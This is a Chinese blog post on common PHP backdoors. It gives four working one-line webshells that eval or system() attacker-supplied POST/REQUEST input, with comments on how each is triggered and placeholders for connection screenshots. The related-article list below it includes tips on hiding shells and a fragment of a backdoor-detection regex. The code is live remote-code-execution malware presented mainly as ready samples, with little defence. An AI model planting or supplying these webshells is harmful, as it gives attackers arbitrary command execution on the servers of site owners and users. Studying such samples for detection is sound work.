常见php后门分析

最新推荐文章于 2024-02-03 15:19:32 发布
原创 最新推荐文章于 2024-02-03 15:19:32 发布 · 1k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

本文详细介绍了四种常见的PHP安全漏洞利用方式,包括通过常量定义触发的一句话木马,preg_replace_callback函数结合正则表达式实现的远程代码执行(RCE),以及通过特定条件执行用户输入的eval方法。这些漏洞可能导致服务器被植入后门,影响系统安全。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、第一种

<?php
define('test', 1); #定义一个常量 test,并且值为1

$test = $_POST[test];#因为前面定义了常量 test且值为1,而此处用了常量test:“$_POST[test]”,所以post传输数据必须为1,否则与前面定义的常量不一致,导致报错

if(test == 1){
	@eval($test);#一句话木马后门
}

连接方式
在这里插入图片描述

二、第二种

<?php

$searchword = $_POST['searchword'];

preg_replace_callback('/asshole(.+)/i', create_function('$arr', 'return system($arr[1]);'), $searchword);
#/asshole(.+)/i的意思是正则匹配$searchword传递的参数中asshole及其以后的所有字符串且不区分大小写,并且将匹配到的所有字符串传递给参数$arr,而system()函数执行传递过来的$arr,导致RCE,php后门

?>

连接方式:
在这里插入图片描述

PHP preg_replace_callback() 函数介绍参考链接:https://www.runoob.com/php/php-preg_replace_callback.html

三、第三种

<?php
$username = $_POST['username'];
$password = $_POST['password'];

if($username =='administrator'){
	eval($password);
	}
?>

连接方法
在这里插入图片描述

四、第四种

<?php
preg_replace_callback('/.+/i', create_function('$arr', 'return eval($arr[0]);'), $_REQUEST['pass']);
#与第二种一样
?>

连接方式
在这里插入图片描述

php后门查询工具
11-03
php源码修改工具,欢迎分享,有需要的下载把,请大家给个好评,谢谢了
Php后门php 后门
06-25
php 后门
一个PHP混淆后门分析
weixin_30597269的博客
09-30 319
洒家的朋友的公司的某个站发现最近被上传了一个后门程序。为了取证我们抓取了HTTP请求流量,看到了一堆莫名其妙看似经过混淆的请求,响应也是看似base64的乱码。洒家用了2个小时静态分析了一遍,并写了利用脚本。后门程序看似是乱码,实际上经过了混淆,通过eval()可以执行任意PHP命令。由于混淆得很乱,做起来实在把洒家恶心了一番。 后门源代码: <?php /** * ...
渗透学习之PHP--后门
qq_62886656的博客
10-03 2026
渗透学习之php
PHP后门
qq_39751956的博客
07-08 441
简单的后门解析,密文都会明确以下方法,说白了就是字符串下标字符拼接//$c(原文经过strtr置换后的密文,由 目标字符+替换字符+base64_encode(‘原文内容’)构成)//strtr//substr//52(这个值不一定)//urldecode解析过的字符串提示:以下是本篇文章正文内容,下面案例仅供参考。
一个不易被发现的PHP后门代码解析
10-25
在网络安全领域,PHP后门是一种常见的安全威胁。后门是一种隐藏的入口,可以让攻击者绕过正常的认证过程,从而获取对系统的未经授权访问。本文将对一种不易被发现的PHP后门代码进行详细解析。 首先,我们来了解后门...
基于PHP的Mysql BackDoor PHP+Mysql服务器 后门.zip
07-22
由于其广泛使用,PHP后门成为网络安全领域一个常见的问题。 在压缩包子文件的文件名称列表中,"132690149690338863"看似是一个随机的数字串,这可能是单一文件的名称或者是多个文件的一部分。在实际情况下,这样的...
PHP加密无后门大马
07-26
1. **代码混淆**:代码混淆是一种常见的保护措施,通过改变代码结构和变量名,使其变得难以理解和分析。例如,可以使用自动化工具将代码转换为无法直接阅读的形式,同时保持其功能不变。 2. **加密算法**:使用强...
PHP隐形后门分析:ThinkPHP框架与base64_decode利用
本文主要讨论了PHP隐形一句话后门常见形式,以及如何利用base64_decode函数在ThinkPHP框架中植入密码程序。通过分析具体的代码示例,我们可以深入理解这种安全威胁及其防范方法。 PHP隐形一句话后门是一种常见的...
基于PHP的Spy2022WEB后门程序源码.zip
08-28
1. **PHP后门类型**:常见PHP后门包括命令执行后门(允许执行系统命令)、文件操作后门(如读写文件)、远程shell后门(提供远程控制服务器的能力)等。 2. **后门隐藏技巧**:攻击者通常会通过混淆、加密或者将...
php万能后门程序
09-11
php万能后门操作类,放如任何php程序中即可使用!
php隐藏后门,php如何隐藏后门
weixin_39603598的博客
03-09 350
php隐藏后门的方法:1、创建系统隐藏文件;2、利用ADS隐藏文件;3、在php环境变量中留shell;4、设置不死马;5、设置“php.ini”后门;6、将关键字拆分,并进行多文件包含;7、将真正的一句话写入数据库。推荐:《PHP教程》php 后门隐藏技巧1. attrib +s +h创建系统隐藏文件:attrib +s +a +r +hattrib +s +h 文件名在 Windows 10下...
手把手教你编写一个简单的PHP模块形态的后门
weixin_34255793的博客
08-03 800
看到Freebuf 小编发表的用这个隐藏于PHP模块中的rootkit,就能持久接管服务器文章,很感兴趣,苦无作者没留下PoC,自己研究一番,有了此文 0×00. 引言 PHP是一个非常流行的web server端的script语言.目前很多web应用程序都基于php语言实现。由于php是个开源软件并易于扩展,所以我们可以通过编写一个PHP模块(module 或者叫扩展 extension)来实现...
多种php后门
xxx9686的博客
09-25 590
【代码】多种php后门
php自动生成后门代码,PHP常见代码执行后门函数
最新发布
xcdm100的博客
02-03 697
应用程序在调用一些能够将字符串转换为代码的函数(例如php中的eval中),没有考虑用户是否控制这个字符串,将造成代码执行漏洞。,按照 php的格式,表达式在两个/之间,如果在表达式末尾加上一个 e,则第二个参数就会被当做 php代码执行。call_user_func_array(): 方法同上,只是第二个参数要是一个数组,作为第一个参数的参数。函数的第一个参数是被调动的函数,剩下的参数(可有多个参数)是被调用函数的参数。调用回调函数,并把一个数组参数作为回调函数的参数。为数组的每个元素应用回调函数。
php一句话后门分析
xiaoshan812613234的专栏
12-05 1473
1.eval  eval用法:  eval() 函数把字符串按照 PHP 代码来计算  该字符串必须是合法的 PHP 代码,且必须以分号结尾。  如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。  <?php eval ($_POST[jusker]); ?> 2.assert  Assert用法:
php简单后门实现及php连接数据库
qq_58683895的博客
10-24 1208
包含php简单后门的实现代码及操作,以及php连接数据库的操作代码及介绍,和相关php函数的介绍
php后门简单检测脚本
weixin_34192993的博客
09-16 632
# coding:utf-8 import os import sys import re rulelist = [ '(\$_(GET|POST|REQUEST)\[.{0,15}\]\(\$_(GET|POST|REQUEST)\[.{0,15}\]\))', '(base64_decode\([\'"][\w\+/=]{200,}[\'"]\))', ...
php nginx func_PHP常见代码执行后门函数(示例代码)
weixin_39943547的博客
03-08 209
PHP常见代码执行后门函数代码执行:应用程序在调用一些能够将字符串转换为代码的函数(例如php中的eval中),没有考虑用户是否控制这个字符串,将造成代码执行漏洞。常见php代码执行函数介绍常用执行代码函数1、eval():eval函数将接受的字符串当做代码执行2、 assert():用法和 eval()一样3、preg_replace():preg_replace 函数一个参数是一个正则表达式,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值